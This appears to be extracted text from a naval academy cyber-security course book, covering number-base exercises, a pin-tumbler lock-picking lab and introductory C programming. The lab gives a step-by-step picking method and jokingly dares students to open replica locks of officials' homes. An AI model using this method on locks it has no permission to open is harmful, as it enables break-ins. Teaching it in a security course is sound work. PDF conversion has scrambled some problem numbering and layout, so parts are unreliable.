Main memory is much faster than secondary memory. Why don't we use main memory for all of our memory
storage needs? In other words, why bother using secondary memory?
Problem 3.
Secondary memory is non-volatile while main memory is volatile. Since it is better to have data be
nonvolatile, why don't we use secondary memory for all of our memory storage needs?
Problem 4.
(a)
(b)
(c)
When you first boot up your computer (no user programs running), where is the Microsoft
PowerPoint program stored?
Where are these instructions copied to in order for you to compose a presentation using Microsoft
PowerPoint?
Where is the Microsoft PowerPoint program stored after you turn off your computer?
Problem 5.
True or false: Running programs are stored in the CPU.
Problem 6.
You type up a document in MSWORD, give it a file name, save it to your ‘My Documents’ folder, and power
down your computer. Where is the file you created now stored?
Problem 7.
What important piece of software controls the computer's hardware and software resources?
Problem 8.
Consider a quantity of 9216 bits.
(a)
(b)
(c)
How many bytes does this amount to?
How many words does this amount to?
How many KB does this amount to?
Problem 9.
Express the binary number 100000 as a decimal number.
Problem 10.
Convert the binary number 10101 to decimal.
Problem 11.
Express the binary number 01110101 as a decimal number.
Problem 12.
Express the binary number 00101110 as a decimal number.
Problem 13.
Convert the decimal number 78 to binary.
Problem 14.
Convert the decimal number 43 to binary.
Problem 15.
Convert the decimal number 223 to binary.
Problem 16.
Express the hexadecimal number 27 as a decimal number.
Problem 17.
Express the hexadecimal number BEE as a decimal number.
Problem 18.
Convert the hexadecimal number 100 to binary.
Problem 19.
Convert the hexadecimal number F1E to binary.
Problem 20.
Convert the binary number 101110011011 to hexadecimal.
Problem 21.
Suppose you are told that an item is at 32-bit address C356A20C. What is the value of the fourth bit in this
address, counting from the left?
15
Problem 23.
Item A requires four bytes of storage and is located at address 0x00000071. Item B requires four bytes of
storage and is located in memory right before (i.e., at a lower memory address than) Item A. Item C requires
2 bytes of memory and is located in memory right before item B. What is Item C's address?
How is the letter k stored in memory in binary?
Problem 24.
How is the letter g stored in memory in hexadecimal notation?
Problem 25.
What is the hexadecimal number that results from the calculation: 0x138
+
0x6
Problem 26.
What is the hexadecimal number that results from the calculation: 0x683
+
0x251
Problem 27.
What is the hexadecimal number that results from the calculation: 0x2A6
+
0xE97
Problem 28.
Consider the picture of main memory (RAM) shown below. The address of the first item is 0x0804839C,
and addresses are numbered sequentially.
Problem 22.
(a)
(b)
(c)
Problem 29.
Labeling the figure showing the addresses for the next eight memory locations.
List the four preceding memory addresses.
If the items stored in the first five memory locations are characters, what is stored in this portion of
memory?
Consider the memory address 730 10 . By hand calculation, express this memory address in hexadecimal
notation, using a number of hex digits appropriate for our 32-bit architecture.
16
Security Exercise 1
Part 1: Why Pick Locks in a Cyber Security Class?
Many hacking conferences, such as the annual DEFCON Conference, have a room set aside for attendees to practice lock
picking.
If you think about it, hacking is a lot like lock picking!
Hacking a computer is like solving a puzzle.
Picking a lock is like solving a puzzle.
Hacking potentially involves breaking into an area that you
are not supposed to have access to.
Picking a lock potentially involves breaking into an area
that you are not supposed to have access to.
Hacking a computer often involves exploiting a defect.
Picking a lock often involves exploiting a defect.
We don’t have to hack into a person’s computer to gain the
desired outcome. We could, for instance, take the user
hostage at gunpoint and force them to surrender their
password. But, by surreptitiously hacking in, we can gain
the desired outcome with the owner remaining unaware.
17
We don’t have to pick a lock to a person’s front door to
gain the desired outcome; we could, for instance, kick
in their front door. But, by surreptitiously picking the
lock, we can gain the desired outcome with the owner
remaining unaware.
Learning to hack takes practice. You can’t learn
hacking just from lecture—you have to get your hands
dirty.
Learning to pick locks takes practice. You can’t
learn to pick locks just from lecture—you have to
get your hands dirty.
By learning to hack you can see how hackers defeat
computer security mechanisms, and this can lead you
to design more secure computer systems.
By learning to pick a lock you can see how burglars
defeat security mechanisms, and this can lead you to
design more secure locks.
If you decide to pursue lock picking as a hobby, note that some states do not even allow possession of lock picking tools. In
the states of Mississippi, Nevada, Ohio and Virginia, simple possession of lock picking tools is taken as prima facie evidence
that you intend to commit a crime. In every state, picking a lock without the lock-owner’s permission is a crime.
In some countries it is illegal to even possess lock picking tools of the type you will use in lab today. For example, merely
possessing lock picking tools in Japan carries a sentence of one year imprisonment. Likewise, in Australia and Poland, mere
possession of lock picking tools is punishable with arrest. Hungary goes so far as to classify lock picks as military weapons
and only the armed forces may possess them.
In this lab, you will work in teams of four midshipmen to pick mechanical door locks.
Part 2: The Pin Tumbler Lock
Let’s examine this figure from The MIT Guide to Lock Picking 3:
Hull
Plug
3
Unless otherwise noted, all figures are from The MIT Guide to Lock Picking, Copyright 1991 by Theodore Tool. All rights
reserved. The author permits reproduction of the document on a non-profit basis provided that this copyright and distribution
notice is included. The information in The MIT Guide to Lock Picking is provided for educational purposes only.
18
This picture shows a pin tumbler lock with no key inserted. Note the primary components:

The hull is stationary.

The cylindrical plug can rotate when the correct key is inserted into the plug.

The lock has pins. In the picture above, the lock has 5 pins. The pin closest to where the key goes in is labeled pin 1.
The pins are in holes that pass through both the hull and the plug. Each individual pin has three components:

A key pin

A driver pin

A spring
The key pin and driver pin are distinct components, but they are forced tightly together by the spring. A protrusion on the plug
(not shown) prevents the spring from pushing the pins completely out of the plug.
Note that in the picture above (with no key inserted) the plug cannot rotate. The reason: The driver pins are protruding between
the plug and hull, preventing rotation.
The picture below more clearly shows the driver pin preventing rotation of the plug.
When a key is inserted, the key pushes the key pin up, which pushes the driver pin up (working against the spring). If the key
raises all the pins to precisely the point where the break between each key pin and driver pin is on the shear line, the plug will
be free to rotate. This scenario is shown below.
19
Thus, the intent is to prevent the plug from moving unless the proper key is inserted. The proper key will lift each key pin to
the point where the break between the key pin and driver pin lines up with the shear line between the plug and the hull.
So… you might be seeing what is involved in lock picking… you have to use a tool to lift pins up so that breaks between the
key pins and driver pins line up with the shear line between the plug and hull. And you might be wondering… How do we lift
all those pins at the same time?
The answer is: You don’t lift all the pins at the same time. You lift the pins one at a time!
To pick a lock, you provide a small amount of force to attempt to turn the plug. The plug won’t turn of course, but the hope is
that one of the drivers will be wedged between the plug and hull (with the other drivers still somewhat loose). In other words,
the hope is that one pin will bind.
20
Then, you use a pick to gently move this driver up to the point where the gap between this particular key pin and driver pin
lines up with the shear line between the plug and hull. At this point, the plug will rotate slightly, causing a different pin to be
the one that is wedged between the plug and hull.
So, to pick a lock, you:

Apply a gentle force to turn the plug using a tension rod.

Using a pick, try to determine which pin is binding.

Gently and slowly push that pin up until you feel it reach the shear line. This will cause the plug to move slightly. We
say that this pin is now set, with the driver pin trapped in the hull above the shear line.
21
 Rinse and repeat
A short video at the link below illustrates the idea (but keep in mind that the order that pins bind might not be as shown!):
http://www.youtube.com/watch?v=v9hhBJHfwJE
Note the critical flaw that makes lock picking possible: Due to limitations in manufacturing tolerances, only one pin at a time
will bind!
Part 3: Let’s Pick Locks
We will use a Southord Locksmith Progressive Lock Picking System to learn how to pick locks. The kit comes with five locks,
creatively given the numbers one through five.
Lock number one is an exact replica of the lock to your Instructor’s residence. The lock has a single pin. The second lock,
an exact replica of the lock to the EC310 Course Coordinator’s residence, has two pins. Therefore this lock is slightly more
difficult to pick than lock one. Lock three, with three pins, is a replica of the lock to the Department Chair’s residence. Lock
four (four pins) is a replica of the lock to the Dant’s residence and picking lock five (five pins) would mean you could gain
access to (gasp!) the Buchanan House.
Each kit comes with four different picks and one tension rod. It is recommended that you use just the “hook feeler pick” and
the tension rod:
22
Hook Feeler Pick
Tension Rod
Your assignment: To complete this lab, you must show the ability to break into your Instructor’s residence and the EC310
Course Coordinator’s residence. To gain extra credit, you must break into the Department Chair’s residence. Show you
instructor or lab technician your successful picking of each lock.
__________
Lock 1
__________
Lock 2
__________
Lock 3 (Extra Credit)
We would give you extra credit if you were to break into the Dant’s residence or the Buchanan House, but we realize that this
far surpasses your meager abilities (hmm… sounds like a dare!).
23
24
Security Exercise 1 Answer Sheet
Have your instructor sign for picking Locks 1, 2 and 3 below.
__________
Lock 1
__________
Lock 2
__________
Lock 3 (Extra Credit)
Although it exceeds your meager abilities, for "completeness", we include signature blocks for Locks 4 and 5.
__________
Lock 4 (Mega Extra Credit)
__________
Lock 5 (Super-duper bonus points)
25
26
Chapter 2: C Programs
Objectives:
a)
b)
c)
d)
Explain the distinction between machine language, assembly language and programs written in a high-level language.
Demonstrate the ability to analyze simple C programs that perform keyboard input, screen output and simple arithmetic.
Demonstrate the ability to create, edit, compile and execute C programs in a Linux environment.
Explain how integers and characters are stored and encoded in memory.
1. Machine Languages and High Level Languages
1.1. Machine Language
Computers can only “understand” ones and zeroes. Everything is bits!
When introducing yourself, try this:
“Hey, there are 10 kinds of people in the world,
those that speak binary and those that don’t.
Which are you?”
Ha ha ha ha!!! Works every time!
But…it gets worse! In addition to only speaking in ones and zeroes, computers can only interpret very simple instructions that
have been “hardwired” as electronic circuits on the CPU chip. This set of simple hardwired instructions is termed the
“instruction set,” and is established by the CPU manufacturer.
Let’s examine something as simple as adding two integers together. Computers can add two integers together because there is
an electronic circuit that works as follows: if you place a value on each of the two inputs to the circuit, the sum of the two
values will be placed on the output of the circuit. You should accept that such a circuit is easy to build—some of your fellow
midshipmen build these circuits in their classes, depending on their major.
Let’s say we have this addition circuit sitting on a table in front of us. How do we get it to actually perform addition? Simply
yelling at the circuit: “ADD TWO NUMBERS!” will not work (though many have tried).
The solution, circa 1950: Run jumper cables! If we wanted to add an integer stored at a location (let’s call the location A) to a
second integer stored at another location (let’s call this second location B), we would have to run cables from A and B to the
first and second inputs of the addition circuit. If we wanted to store the resulting sum at location C, we would have to run a
jumper cable from the output of the addition circuit to location C.
From the dawn of computers (mid-1940’s) to the early 1950’s, programming a computer consisted of running frantically around
a room, connecting and disconnecting cables from various locations on the large (room-size) computer for each calculation that
had to be performed. This was arduous physical activity, and computer operation was very slow (but, on the bright side,
computer programmers tended to be physically fit).
Computers were slowed down by humans. The human operators might need five minutes to connect all the cables for a
calculation that the circuit—once wired up—would then accomplish in five microseconds. So, the critical question arose: How
can we “communicate” with the computer to instruct it to perform complex tasks while sitting at our desk?
27
Early Programmers Hard at Work on the ENIAC (US Army Research Lab)
The solution: The circuit for each instruction in the CPU’s instruction set (for example, our addition circuit) is associated with
a unique bit string that the CPU can interpret. For example, it may be the case that if this bit string is set to 00100011, our
addition circuit will be used. If this bit string is set to a different value, say 11001000, the circuit that does a different instruction
(perhaps the comparison circuit that determines if the first input is larger than the second input) will be invoked. Moreover, all
of the required bit strings (needed to do whatever it was we needed to do) were placed in the computer's main memory at the
outset. This stored set of instructions, a program, replaced the need for jumper cables.
So, to write a program, the programmer must determine which operations from the instruction set he wishes the CPU to carry
out, then determine the unique bit strings corresponding to these instructions. These instructions (i.e., this program) are then
placed in memory, and the CPU executes one instruction after another.
An example should clarify. Suppose we have again our two integers A and B and we want to calculate the sum as C = A + B.
Using instructions from the CPU’s instruction set, the program to accomplish this might look something like Program 1, shown
below on the left (with corresponding explanations shown on the right):
Program 1
00010000
00000111
00100011
00001111
00010001
00000100
What it means to the computer
load into the CPU the integer…
…which we are calling A.
Add to this…
…what we are calling B
Now place this result…
…in the place we are calling C.4
This program is written in machine language, language that the computer can actually follow. Most early programs were
written this way. Since machine language is defined by the hardware (the CPU’s instruction set), machine language is machinedependent.
1.2. Assembly Language (“Low Level Language”) Machine language programming was tedious, time-consuming, prone
to error, cumbersome, and generally awful. Imagine having to write a program like Program 1 above just to add two integers.
But, machine language programs are the only kind of programs that the CPU can understand.
To make programming easier for humans, the machine instructions were replaced by “English-like” words, while decimal
numbers and symbols replaced strings of bits. The new languages, using English-like wording, were called assembly
languages. Using assembly language, if we wanted to perform, say, addition, then instead of using the code
00100011
which is the appropriate machine language code from our prior example, we would instead use the corresponding assembly
language instruction
ADD
4
The experienced programmer would recognize that the quantities A, B, C and D would actually be register values or the addresses of the
variables. This simple example is not meant to be technically rigorous, and is certainly not intended to represent any actual machine
language standard.
28
Program 1 on the previous page might appear as Program 2 below, written in assembly language.
Program 2
LOAD A
ADD B
STORE C
Computers don’t understand assembly language; computers only understand machine language. So, before a computer can
execute an assembly language program, it must be converted to machine language. An assembler is the software that translates
an assembly language program into a machine language program.
Because of the nearly one-to-one correspondence between assembly language symbols and instructions in the instruction set,
assembly language programs execute very efficiently.
1.3. High Level Languages Assembly language programming is still not enjoyable. For one thing, it takes time to write
programs in assembly language because simple tasks take many lines of code. There is generally one assembly language
symbol (e.g., “ADD”) for each instruction in the instruction set. Writing programs in assembly language is not fun, and if there
is anything that electrical engineering is about, it’s having fun.
High-level languages were developed to allow programmers to write programs that are closer to natural English. In a high
level language, Program 1 on the prior page might simply be
Program 3
C = A + B
A single high-level language statement is usually equivalent to many, many instructions in the CPU instruction set (and
therefore also equivalent to many, many assembly language instructions). A program written in a high-level language is called
a source program (or source code).
Again, since computers only understand machine language, a program written in a high-level language must be translated into
machine language. A compiler is the software that translates high-level language into machine language.
High level language program
Compiler
Machine language program
All compilers convert high-level language programs to machine language programs, but, in addition, some compilers will
also provide a listing of the assembly language code that corresponds to the machine language. This often proves very
useful, as we shall see.
1.4. Program Development In this course you will gain some familiarity with the C high-level language. C works at a
lower level (“closer” to the hardware) than do other languages, such as Java. With C, we can gain a finer control over what
the computer is actually doing.
The C language is approximately four decades old. In 1970, at AT&T’s Bell Labs, engineers Ken Thompson and Dennis
Ritchie wanted to write an operating system to support a computer game they had written (Space Travel). They wanted to
write the operating system in a high-level language (prior to this, operating systems were written in assembly language.)
Finding no high-level languages satisfactory, they started with an existing language named BCPL as a base, and designed a
new language, subsequently named B. The language was further improved and renamed C. This is the C language we have
today. Having developed the C programming language, they returned to their task of writing an operating system in C. This
operating system was UNIX.
So, yes, the love that computer engineers have for video games led to the development of the C language and the UNIX
operating system. Here is a screenshot from the game Space Travel, to give you an idea of what computer geeks were salivating
over back in 1970:
Now that we have discussed machine language and high-level languages, it is worthwhile to briefly cover the mechanics of
using the C high-level language. You will enter your program by typing your C source code using a text editor (which—from
a text entry point of view—you should find similar to using a program such as Notepad). As previously mentioned, you will
29
then send your program to a compiler, which will translate your program into the machine language that the computer can
understand. You will then “run” (i.e., execute) your program.
So…we have three basic steps: Edit, Compile, Execute.
Your brains and hands
Editor
C program
Machine language program
Compiler
Used to type in the program
FINAL EXECUTABLE PROGRAM
It should be emphasized once again: It is only the machine language program that is actually executed on the computer.
2. The Basics of C
Why learn to program in C? Who uses C programs? You do! Here are some programs written in C (and its child, C++):






MSWORD
Acrobat Reader
PowerPoint
Firefox
All Windows operating systems
Most games
In fact, despite what those CS kids might tell you, most programmers today are programming in C! The chart below shows the
relative popularity of programming languages over the years. C and Java have been battling for the title of "#1 Programming
Language" over the past years; C was the top language in 2013 and 2014; Java won the title (barely) in early 2015.
C
From TIOBE: The TIOBE Programming Community index is an indicator of the popularity of programming languages. The ratings
are based on the number of skilled engineers world-wide, courses and third party vendors.
It is quite fair for the busy midshipman to ask: "Why do I have to have basic familiarity with C programs?" The answer: The
only way you can truly gain an appreciation for the damage that computer programs can do to your host computer is to learn a
little computer programming. And since most programs are written in C (or its child C++), that’s a logical choice for us to
pursue. To quote your textbook author: “An understanding of programming is a prerequisite to understanding how programs
can be exploited.”
2.1. Program Layout Program Layout. Simple C programs have the following layout
#include<stdio.h>
int main( )
{
our simple program
}
A complicated way of saying: "This is the start of the program."
The closing brace says: “This is the end of the program.”
Our simple program will consist of two parts:
 We first tell the computer the names of the variables we are going to use and the type of information they will
hold. This part of the program is called the variable declarations. As we’ll see, we have to tell the C compiler
about all the variables we intend to use in our program.
30

The second part tells the computer to do something with our variables. These individual instructions are called
statements.
So, our program layout can be further refined:
#include <stdio.h>
int main( )
{
variable declarations
statement 1;
statement 2;
(etc., etc.)
statement n;
}
Spacing. We can use our own choice for line spacing and indentation. Specifically, we can have multiple blank lines between
statements, we can indent each line as much as we like, we can place any amount of space between different words, etc. As a
general rule, you should use line spacing and indentation to make programs easy to read. To enhance readability, place each
statement on its own line (unless it won’t fit).
The Semi-colon. Each statement is an instruction which is followed by the computer. Each executable statement is ended
with a semi-colon. Put another way, a semi-colon marks the end of an executable statement.
Syntax. The syntax of C is the set of rules for constructing correct statements. That is to say, the grammar rules of the
programming language are referred to as the syntax. For example, ending each statement with a semi-colon is a grammar
rule—part of the syntax. If we violate a grammar rule, it is said that we have made a syntax error. For example, if we don't
include a semi-colon where necessary, or if we leave off a program’s closing brace, we have made a syntax error. The compiler
will detect syntax errors.
Comments. We can insert comments into programs in order to help other people (and ourselves!) understand the program.
Comments are ignored by the compiler. No machine language is generated by comments. To insert a comment, use two
consecutive slashes ( // ) with no space between them. The comment will begin immediately following the two slashes and
run to the end of that line. Consider this example:
#include <stdio.h>
int main( )
{
int length = 6, width = 5, height = 2;
//Look at me!
// Random comment, just thrown in to show you a comment.
}
2.2. Variables A variable is a location in computer memory where data can be stored; that is, a variable holds data, for
instance a number or a character. The data held in a variable is called its value.
Identifiers. We give each variable a name. We can imagine that the memory location for our variable is actually labeled with
the variable’s name. For example, if we have a variable named age that holds the value 50, we can "imagine" that in main
memory my variable is held in a box labeled "age":
age
50
Of course, in actuality, my variable is stored at a specific memory address (and is stored in binary).
The programmer is free to choose the names of his variables subject to only a few constraints: A variable name must start with
a letter. All other characters in the variable’s name must be letters, numbers or the underscore symbol. So, m171234 could
be chosen as a variable name, but 171234 or m-171234 could not be variable names (in the first case, the faulty name starts
with a number, in the second case the faulty name has a hyphen as one of its characters).
Variable Declarations. Every variable must be declared before it can be used. When you declare a variable, you tell the
computer the variable’s name (i.e., its identifier), and what kind of data you are storing in the variable. The compiler reserves
a location in memory to hold the variable’s value.
The kind of data that a variable holds is called the variable’s type. More on this in a moment, but, first, the syntax of a variable
declaration is:
type
variable_name_1, variable_name_2, ... , variable_name_x ;
31
Note that when you declare more than one variable of the same type in a declaration, a comma is used to separate the variable
names. Also notice that a variable declaration ends with a semicolon.
Variable Types When you declare a variable, you must tell the computer the variable's type, i.e., the kind of data the variable
will be holding. For now, our choices for type are:
Kind of data
type
Integer (e.g., 1, -5, 39)
Real Numbers (e.g., 2.35, -9.9)
A single character (e.g., A, $, b)
Amount of space reserved to hold the variable
int
float
char
stored in 4 bytes
stored in 4 bytes
stored in 1 byte
Notice that integers are always stored as four bytes. So, for example, the integer value 2 is represented in binary as 10 and
would be stored as the four-byte quantity:
00000000
00000000
00000000
00000010
Examples of Declarations. If we wanted to declare a variable that would hold someone's age as an integer, we would use
int
someone_age;
If we wanted to declare two variables that would store a midshipman's status as a single character (e.g., P for Plebe, Y for
Youngster, S for Sleeper, F for Firstie), we would use
char
mid1, mid2 ;
Why do we need to declare variables? Consider the following series of 1’s and 0’s stored in memory: 01000001. This
set of 1’s and 0’s can be



The character A in ASCII
the integer 65 (under the presumption that the three preceding bytes are all zeros since integers use four bytes)
some real number
Which is it? There is no way of knowing, unless we tell the compiler up-front the type of data the variable is intended to hold.
If we tell the compiler the aforementioned value (01000001) is the value of variable of type char, the compiler will interpret
the value as the character A. If, on the other hand, we specify that this is the value of a variable of type int, the compiler will
interpret the value as the integer 65. By declaring a variable we tell the computer how much memory to use for the variable
and what code to use when converting the variable’s value to and from a binary string.
2.3 Data Representation. Positive integers are stored in four bytes by converting the integer to a binary number. The right
most 31 bits are used. The leftmost bit is set to zero (indicating a positive number).
We will not be concerned with negative integers in this course, but you should be aware that they are also stored in four bytes
and the left-most bit will be a one.
Variables of type char are stored in one byte using the ASCII code. The ASCII table from previous chapter is repeated below.
32
2.4 Initializing Variables. All variables always have some value. When we first declare a variable, it will have a value
determined by whatever pattern of ones and zeroes were left in that memory location by the previous program. For our
purposes, this value is a garbage value. To avoid inadvertently using garbage values in a program, it is often advisable to
initialize variables when they are declared. The syntax is:
type
variable_name = value ;
Some examples of variable declarations in which the variable is initialized in the declaration are:
int
answer = 0;
float weight = 350 ;
Practice Problem 2.1
What data type would be optimal to store the following classes of data?
(a)
(b)
(c)
(d)
The number of jellybeans in a jar
The cost of a Snickers bar
The circumference of a lollipop
The individual letters in the word "skittles"
Solution: (a)
(b)
(c)
(d)
33
Practice Problem 2.2
How many total bytes would be needed to store the following variables?
int tacos, chimichangas;
int nachos = 14;
float pico, de, gallo;
char tortilla, guacamole;
float burritos = 2;
Solution:
2.5. The Assignment Statement. The direct way to change the value of a variable is by use of the assignment statement.
The assignment statement has the form:
variable = expression;
where the expression on the right can be:



a literal (i.e., a number such as 5, or a character such as the dollar sign)
another variable
a more complicated expression made up of literals, variables and mathematical operators
Some examples of assignment statements are:
int answer, solution;
answer = 10;
solution = answer;
answer = solution + 10;
// Now solution equals 10
// Now answer equals 20
It is important that you understand how an assignment statement works. In an assignment statement, the value of the expression
on the right hand side of the equal sign is first computed, and then the variable on the left hand side of the equal sign is changed
to this value. For example, the statement:
area2 = area2 +10;
would make no sense as an algebraic equation, but in C this statement means: “Make the new value of area2 equal to the old
value of area2 plus ten.” It is important to note that the equals sign is the assignment operator.
A note about char variables. Variables of type char hold single characters such as a, b,…z, A, B,…0, 1,…9, !, #, @. It
is important to note that a character literal is enclosed in single quotes. For example, to declare a variable that will be used
to store marital status (M for married, S for single), we might use:
char marital_status;
marital_status = 'M';
Of course the two previous lines of C code could have been combined into one declaration as
char marital_status = 'M';
2.6. Mixing Types Generally, you should not store a value of one type in a variable of another type. The biggest problem
occurs when storing a real number in an integer variable. When we store a real number in an integer variable, the portion after
the decimal is truncated (not rounded).
Practice Problem 2.3
Consider the two lines of C code:
int a;
a = 0.9999;
If we were to now print out the value of the variable a, what value would we see?
Solution:
Of course every rule has its exception. Concerning “mixing types,” it is acceptable to assign integers to variables of type
float. The following code would be perfectly fine:
float speed;
speed = 55; // sets speed = 55.0
34
3. Simple Output
3.1. The printf statement To output data from our program to the screen (i.e., the monitor) we use a printf statement.
Think of printf as being another name for the monitor. By using printf we can send to the screen:



values of variables
arithmetic expressions
strings of text
printf syntax for character strings. The syntax for printing a string of characters is
printf(
" the stuff I want printed
" ) ;
Note the quotation marks
When we want to output a text string, we place the string in quotes. The text string appears exactly as typed, except the quotes
are not printed on the screen. For example, the line of C code
printf( "To be a mid or not to be." );
will output to the monitor: To be a mid or not to be.
3.2. A Note on Spacing. The computer will not insert spaces before or after the items that are output using printf. A new
printf will start printing to the screen exactly where the last printf left off. We often begin and end strings with blanks
to keep the output from running together.
Practice Problem 2.4
What is the output produced by these two lines of C code:
printf("Go Navy!");
printf("Beat Army!");
Solution:
3.3. Output Escape Sequences. Since a new printf statement begins where the last printf statement left off, output will
run along one line. To get a new line, we use: "\n" (i.e., \n inside quotes).
The sequence \n is called an escape sequence. The backslash tells the compiler to escape the normal meaning of the next
character, and apply an alternate meaning. In this case, "\n" tells the compiler to advance the cursor to the next line on the
screen. Other escape sequences:
\t
\\
\"
\'
tab
print a backslash
print a double quote symbol
print a single quote symbol
Practice Problem 2.5
What is produced by each of these code snippets?
(a)
printf("Go Navy\n");
printf("Beat Army\n");
(b)
printf("Go Navy\nBeat Army\n");
(c)
printf("Go Navy\tBeat Army\n");
printf("\"Go Navy\nBeat Army\"\n");
printf("A\\B\n");
Solution:
(a)
(b)
(c)
35
3.4. printf with conversion specifiers
Conversion Specifiers. Next, we discuss the printf syntax for printing numbers and characters within strings. What was
previously termed a character string is now termed a control string, since it will also contain information which controls how
variables will appear.
We must specify the format of the numbers and/or characters with conversion specifiers which describe the format to be used
in printing the corresponding variables. The order of the conversions specifiers is matched to the order of the variables that
appear after the control string. The conversion specifiers are:
%d
%f
%c
%s
for an integer
for a floating point
for a character
for a string
The use of conversion specifiers is best illustrated with an example.
Practice Problem 2.6
Explain what is printed out by the following line of C code:
int number = 3050;
float gpa_low = 3.13 , gpa_high = 3.95;
printf("%d midshipmen have a GPA between %f and %f\n", number, gpa_low, gpa_high);
Solution:
Conversion Specifiers with Simple Strings. We mentioned that we can print a string of characters without using conversion
specifiers. For example, we could print the phrase Go Navy! by using the statement:
printf("Go Navy!");
We could, just as well, have used a conversion specifier to print out this string of characters, as in:
printf( "%s" , "Go Navy!" );
It may cause fewer errors to consistently use format specifiers, even for simple character strings.
Practice Problem 2.7
Determine the error in the complete C program shown below:
#include <stdio.h>
int main()
{
int apples = 42;
printf("There are %c apples in my barrel\n", apples);
}
Solution:
4. Simple input with the scanf statement
4.1 The scanf statemet. The scanf statement is used for inputting data to the program from the keyboard. Think of
scanf as being another name for the keyboard. The scanf statement, like the printf statement, uses a control string
followed by the memory locations of the variables to receive the values typed in at the keyboard.
Best to go to an example! To read an item from the keyboard and place the value into a variable named year_number of
type int, we use:
int year_number;
scanf("%d" , &year_number);
The first part following the parenthesis—%d—is the conversion specifier. The %d indicates that the item that we will type in
at the keyboard is intended to be an integer. As before, we use the conversion specifiers:
36
%d
%f
%c
%s
for integer
for floating point
for character
for a string
The second part of the scanf statement—&year_number—indicates that the integer typed in at the keyboard should be
placed in the variable named year_number. It is a very common error to omit the & in scanf statements. 5
You should understand how the scanf statement works. When the computer sees a scanf statement, it stops and waits for
input to be entered from the keyboard. The program does not read the input until the user hits the ENTER key. (This allows
the user to backspace and correct mistakes). Pressing the ENTER key makes the data that we type available for the program.
When we press ENTER, what we typed in is assigned as the variable’s value, and the computer then resumes operation.
Before reading something from the keyboard, it is always a good idea to prompt the user to enter the value using a printf
statement.
Practice Problem 2.8
What is the output produced by this complete C program:
#include<stdio.h>
int main()
{
int year_number;
printf("Enter the year: ") ;
scanf("%d" , &year_number);
printf("\nThe year is %d \n"
}
, year_number);
Solution:
You can enter multiple values using a single scanf statement. This is illustrated in the practice problem below.
Practice Problem 2.9
What is the output produced by this complete C program:
#include<stdio.h>
int main()
{
int year, month;
printf("Enter the year and the month (1-12): ") ;
scanf("%d
%d" , &year
,
&month);
printf("\nIt is now %d / %d \n"
, month , year);
}
Solution:
Note that values entered via the keyboard must be separated by at least one blank. The first value entered at the keyboard is
stored in year and the second in month. When the computer reads in data with scanf, it ignores spaces, tabs and returns
(other than using the return as a signal from the user that data has been entered).
The ampersand that precedes the variable year_number is the address operator. We’ll talk more about this later. For
now, just remember that with the scanf statement you want to ensure you include an ampersand before each variable name
of type int, float and char.
5
37
Practice Problem 2.10
Add one line to the C program shown below (at the point indicated) so that the output shown below is produced when the user
enters 3.5 when prompted.
#include<stdio.h>
int main( )
{
float number;
printf("Enter a number and I will multiply it by 2: ");
scanf( "%f" , &number );
// Enter one line of code here!
printf("Twice the value you entered is: %f \n" , number );
}
Desired output:
Enter a number and I will multiply it by 2: 3.5
Twice the value you entered is: 7.000000
Solution:
Practice Problem 2.11
Match the term on the left with its appropriate description on the right:
printf
instruction set
(a)
(b)
the C programming language
the C assignment operator
scanf
machine language
compiler
assembler
high-level language
assembly language
(c)
(d)
(e)
(f)
(g)
(h)
translates assembly language into machine language
the conversion specifier for an integer value
allows the program to receive keyboard input
the C escape sequence for a new line
instructions expressed as bits
program that converts source code to machine language
%d
(i)
all of the simple instructions hard-wired on a CPU
=
(j)
used to display text to the monitor
\n
(k)
English-like words that represent machine code
Solution:
5. Program Errors
A program error is termed a bug. The process of finding and eliminating program errors is called debugging. There are three
different types of program errors.



Syntax errors These are violations of the C grammar rules. These errors are caught by the compiler.
Run-time errors (also called execution-time errors). These are errors that are detected as the program is running.
These errors usually entail an attempt to perform an illegal operation, and usually cause the program to crash.
Logic errors – these errors are the hardest to find! The program is grammatically correct and executes without
errors, but does not do what we want it to do. As an example, suppose we calculate the average of two float
values a and b and assign the result to a float variable named average by using:
average = a + b /2.0 ;
Since C evaluates division before addition, the statement above will be understood by the C compiler as:
average = a + (b /2.0) ;
which is, of course, not what we intend! 6
6
The correct line of C code to perform the average would be: average = (a + b) /2.0 ;
38
To avoid logic errors, you should “trace-through” your program on paper to make sure the logic is correct. When
you trace through the program, you should consider various input possibilities. Statistics show that greater than
50% of a programmer’s time is spent on debugging.
For your reading and viewing pleasure, here are some examples of software errors that led to disasters of one type or another.
These will not be reviewed in class: View/read on your own time if interested.
Runtime error:
Logic error:
http://www.wired.com/science/discoveries/news/1998/07/13987
http://en.wikipedia.org/wiki/Mars_Climate_Orbiter
39
40
Reading
Read Appendix 2, titled "The Linux File System".
Problems
1.
Write a complete C program that prompts the user to enter his initials. The program should then provide the following
output message EXACTLY as shown below (where, in this illustration, the user entered his initials as P and V):
Please enter your initials: PV
Thank you PV for using the program.
Turn in a copy of your source code and a screen capture of your program successfully running. For example, my
source code is shown below:
2.
Write a complete C program for converting temperature values from degrees Fahrenheit to degrees Celsius. The
program should prompt the user to enter a temperature in units of degrees Fahrenheit. The program outputs the
temperature in degrees Celsius.
If T f is the temperature in degrees Fahrenheit, the temperature in degree Celsius, TC , is given by
TC 
5
Tf  32
9
You should declare the two temperatures to be of type float.
Turn in a copy of your source code and a screen capture of your program successfully running. For example, my
source code is shown below:
3.
Start at your command prompt for the EC310 VM:
midshipman@EC310:~ $
(a) Determine how many users have accounts on your Linux system? What are their names?
(b) How many items (directories and files) are immediately under the root directory?
4.
How many total bytes would be needed to store the following variables?
int time_1, time_2, time_3;
float PRT1 = 9.5, PRT2 = 8.7;
char mid_1, mid_2;
5.
Determine the error contained in the program shown below.
1
2
3
4
5
6
6.
#include <stdio.h>
int main()
{
int favoriteNumber = 2017;
printf("My number is %d\n", favorite_Number);
}
Consider the Linux file system shown below.
41
(a)
(b)
(c)
(d)
7.
What is the absolute pathname for the directory bob?
What is the absolute pathname for the file lesson5?
If your working directory is joe, what is the relative pathname for the file lesson5?
If your working directory is dane, what is the relative pathname of the root directory?
For each of the following questions select the answer that best identifies the type of computing code being described
from the choices
high-level code
assembly code
machine code
honor code
(a) Code resulting from a successful compilation of a C program's source code.
(b) Code used when we write programs in the C programming language.
(c) This code uses English-like mnemonics which correspond to machine instructions.
8.
You and your friend have been tasked to write a C program that prompts the user to enter his initials. The program
should then print to the monitor the user's initials. For example, here is how a run of the program should look:
Your friend has written the program shown below, but her program contains an error. (Note that the numbers shown
on the far left are line numbers shown for convenience… these are not part of the program.)
1
2
3
4
5
6
7
8
9
